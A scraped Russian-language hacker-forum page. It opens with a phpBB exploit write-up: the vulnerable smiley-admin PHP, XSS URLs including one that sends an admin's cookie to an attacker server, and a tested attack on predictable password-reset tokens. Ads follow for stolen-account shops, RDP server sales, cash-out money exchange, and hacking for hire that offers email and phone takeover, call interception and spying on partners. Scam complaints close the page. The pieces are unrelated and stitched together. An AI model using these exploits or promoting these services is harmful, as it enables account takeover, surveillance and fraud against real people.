$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url']: $HTTP_GET_VARS['smile_url'];$smile_url = phpbb_ltrim(basename($smile_url), "'");$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];$smile_code = trim($smile_code);$smile_url = trim($smile_url);$smile_emotion = trim($smile_emotion); // If no code was entered complain ...if ($smile_code == '' || $smile_url == ''){message_die(GENERAL_MESSAGE, $lang['Fields_empty']);} //// Convert < and > to proper htmlentities for parsing.//$smile_code = str_replace('<', '<', $smile_code);$smile_code = str_replace('>', '>', $smile_code); //// Save the data to the smiley table.//$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)VALUES ('" . str_replace("'", "''", $smile_code) . "', '" . str_replace("'", "''", $smile_url) . "', '" . str_replace("'", "''", $smile_emotion) . "')";$result = $db->sql_query($sql);
Примеры:
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrg
reen.gif&smile_emotion=c" onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrg
reen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrg
reen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.co
okie)"%20&sid=SIDofADMIN
--
Узявимость в в генераторе случаных чисел:
При восстановление пароля пользователь вводит е-маил и имя пользователя.phpBB генерирует id подтверждения
/includes/usercp_sendpasswd.php line 51"$user_actkey = gen_rand_string(true);" and than generate a password.  /includes/usercp_sendpasswd.php line 55"$user_password = gen_rand_string(false);"
Id подтверждения отсылаеться на е-маил с сылкой по которой должен проследовать пользователь для подтверждения. Давайте посмотрим на gen_rand_string() функцию:
/profile.php line 61function gen_rand_string($hash){$chars = array( 'a', 'A', 'b', 'B', 'c', 'C', 'd', 'D', 'e', 'E', 'f', 'F', 'g', 'G', 'h', 'H', 'i', 'I', 'j', 'J', 'k', 'K', 'l', 'L', 'm', 'M', 'n', 'N', 'o', 'O', 'p', 'P', 'q', 'Q', 'r', 'R', 's', 'S', 't', 'T', 'u', 'U', 'v', 'V', 'w', 'W', 'x', 'X', 'y', 'Y', 'z', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); $max_chars = count($chars) - 1;srand( (double) microtime()*1000000); $rand_str = '';for($i = 0; $i < 8; $i++){$rand_str = ( $i == 0 ) ? $chars[rand(0, $max_chars)] : $rand_str . $chars[rand(0, $max_chars)];} return ( $hash ) ? md5($rand_str) : $rand_str;
зная, что PRNG's действительно не случаен, и что данный те же самые, PRNG произведет те же самые случайные числа, мы можем безопасно предположить это из-за "srand( (double) microtime()*1000000); " то число всегда будет от 1 до 999,999. Также знание, что пароль сгенерирован прямо после получения id подтверждения, как только мы получаем id подтверждения, индексное микровремя, используемое, чтобы отобрать поколение пароля не будет слишком далеко, чем микровремя имело обыкновение отбирать id подтверждения. Самое плохое в этом сценарии атаки - то, что Вы должны будете послать 1мил запросов на сброс пароля , нападавший может однако снизить этот показатель к диапазону 100 КБ, если он с умеет синхронизировать, время посылки запросы со временим на сервере, А оно отображаетсья на каждой главной странице любого форума. 
 
[phpbb - нападение]
 
Я написал 3 программы, ту, которая создовала произвольные пароли и таблицы id подтверждений , ту, которая посылала GET запросы для активизации смены пароля и последнию, которая использовала список паролей, чтобы сделать нападение по словарю на учетную запись phpbb. Испытательный сайт, который я решил использовать, останется анонимным (я был забанен!) После производства id подтверждения и паролей, я решил пробовать сбросить мою собственную учетную запись. Я запросил изменение пароля к моей собственной учетной записи. Я немедленно запустил мою вторую программу, чтобы послать id's подтверждения, которые были усечены, чтобы иметь только 6 символов (длина используемую на сервере). 
 
После 40 минут программа пометила это, это сумело сбросить пароль, и это выводило id подтверждения, который активизировал изменение пароля. Я взял id подтверждения, открыл мою таблицу и узнал, что логин проверки правильности был в индексе 117312 (мне повезло , могло, были и больше). Я открыл таблицу паролей, удалил все перед индексом 117312 и все после индекса 120000,получилс список в 2688 пароля. Я запустил мою заключительную программу, используя список паролей. Я получил новый пароль в течение 10 секунд, это было в индексе 117490, что означает, что чтобы произвести id подтверждения надо примерно 178.



#1243 Магазин Онлайн!

Написано Opasniy : 15 Август 2016 - 09:35

Доброго времени суток !

Лучший Магазин Аккаунтов и много другова !
9f3773b9eae2.gif



#357 Обмен и вывод средств. (Администрация)

Написано Admin : 07 Май 2016 - 10:02

Здравствуйте уважаемые друзья и гости нашего форума.

Администрация XAKERPRO предлогает вам выгодный обмен электронных денег, Яндекс деньги, Qiwi, WebMoney, Perfect Money, BTC.

Обмен осуществляется на сумму не более 14.000р единоразово, по желанию можно повторить операцию но не более 10-ти операций в сутки для одного клиента.

А также совершим любые финансовые операции по выводу и обналичиванию средств (Оф-шор).

Быстро, качественно, конфидециально.

Низкие проценты за обмен.

Операции Offshore обсуждаются отдельно в Telegram.


Обращайтесь:


E-mail:
XPRU@PROTONMAIL.COM


Telegram: @Временно не доступен


Для уточнения или по каким либо вопросам

можете обратиться на прямую к администратору форума.



Прикрепленные изображения

  • image.jpg

  • Это нравится: Admin


#27045 продажа дедиков

Написано ant-djs : 03 Ноябрь 2018 - 12:14

Магазин дедиков, купить дедик, купить рдп, купить rdp, купить дедик vnc, купить туннели ssh, buy rdp, buy dedicated
http://rdpsocks.ru




#24686 ***Placementorder. ВЗЛОМ. Получение доступа к чему угодно ***

Написано placementordep : 22 Январь 2018 - 01:59

***Placementorder. ВЗЛОМ. Получение доступа к чему угодно ***

В нашем арсенале возможностей есть все базовые услуги что вы можете найти в сети и так же достаточное кол-во возможностей для решения задач повышенной сложности, поэтому мы не будем тратить время перечислением первых, а сразу перейдем ко вторым.

ВЗЛОМ:?


Не нужно писать в ЛС на форуме. Все контакты указаны ниже

Пишите на почту: placementordep@gmail.com

1. Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.

2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com , live.com , mail.com , aol.com , hotmail.com , и пр.
- mail.ru , yandex.ru , bk.ru , rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта... Сделайте Взлом на заказ или заказ на взлом любой почты.

3. Получение удаленного доступа к пк
- Mac, Win, Unix и пр.
- Получу удаленный доступ к пк, выкачаю файлы, удалю файлы, заблокирую доступ и любые даже экстравагантые просьбы.

4. Удалю все, что мешает в интернете, очищу любые ресурсы : блоги, форума, каналы ютуб, новостные ресурсы и даже БАЗЫ ДАННЫХ любых учереждений.
- Очистим любую информацию, что есть в сети, готовы почистить поисковые системы, чтобы не выдавали информацию по нужному запросу. Можете обращаться к нам сделаем в лучшем виде.

5. Взлом Iphone и любых приложений.
- Взлом viber, whatsapp, и любых других приложений.
- Вариант получения удаленного доступа к телефону и выкачке/удалению любой информации/слежения за жертвой.

6. Любые операции с Мобильными операторами.
- Распечатка смс, прослушка звонков.
- Определение местонахождения абонента в реальном времени.
- Защита от перехвата смс, защита от прослушки.

7. Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей, повторяю работаем с зарубежными.


8. Взлом Skype и любой другой телефонии.

9. Взлом серверов любых типов.

Полная анонимность, почта защищена от посторонних глаз!

*Схема работы стандартная.
*Строго Через гаранта (Готовы пройти Любые проверки на форуме)
*Анонимно. Пароль остается прежним.
*Любые доказательства на выбор заказчика.
*Хотите узнать с кем общается Ваша половинка в интернете?
*Желаете всегда быть в курсе дел Ваших конкурентов?
*Нужно узнать секреты или поймать на лжи?
*Мои услуги и возможности более детально:

Чтобы сделать заказ:

Пишите на почту: placementordep@gmail.com

Принимаем к оплате

– yandex деньги
– qiwi
- Webmoney
- Bitcoin

Работаем 24 часа в сутки!
  • Это нравится: Leon


#14196 Отзывы о blackhacker.ru

Написано Владислава : 31 Октябрь 2016 - 09:49

Добрый вечер народ, хочу вам рассказать что форум  

http://blackhacker.ru Это ресурс мошенник такой-же как и описанный здесь ранее форум-хакеров.рф 

На их ресурсе существует подобная схема выставить себя во всей красе а на самом деле это далеко не так и администратор грубый и не чего там не решает, он создаёт темы люди просят помощи и подобное а их обманывают!!! Вот пример почему я сравнил его с форум-хакеров.рф там на форуме многие просят проверить ресурс а его сразу начинают критиковать не проверив. так-же и на blackhacker.ru 

Я так и попался, послушал их совета и обратился к тем кто у них на форуме промышляет, спрашивал не за этот ресурс а за другой, вообщем кинули меня на почти 5т.р 

на форуме blackhacker.ru 

Я отписывался и прочее админу но там как будто нет его просто. Вообщем я понял что меня кинули и решил обратиться к тем кого они критиковали и мне помогли , вот такая история друзья, знайте blackhacker.ru не кого не проверяют а их форум настроен на обман, только для того чтоб им поверили они говорят, якобы те или иные люди(Хакеры/ресурсы) мошенники, хотя сами являются таковыми.

Помогите мне рассказать как можно большому количеству людей в сети о том что  ресурс http://blackhacker.ru МОШЕННИК!

Согласна с вами полностью, плохо что раньше не наткнулась на тему, а увидела сайт только тогда, когда уже обратилась на их сайте к мошеннику. Хочу тоже оставить отзыв о сайте blackhacker.ru Я обратилась там к человеку и узнала за гарантии всё звучало так убедительно что я аж поверила в то что нашла настоящего хакера, но моя радость была не долгой, я как только оплатила деньги ему мне сразу перестали отвечать, писала администратору там тоже тихо. а чуть позже этот "горе-хакер"мне написал: смиритесь вас обманули, я написала админу, но он то же самое, молчит как и раньше, сделала вывод, что этот сайт-это чистой воды развод. прошу распространить данную статью, чтобы все знали о том, что http://blackhacker.ru кидают людей. Спасибо.


  • Это нравится: Admin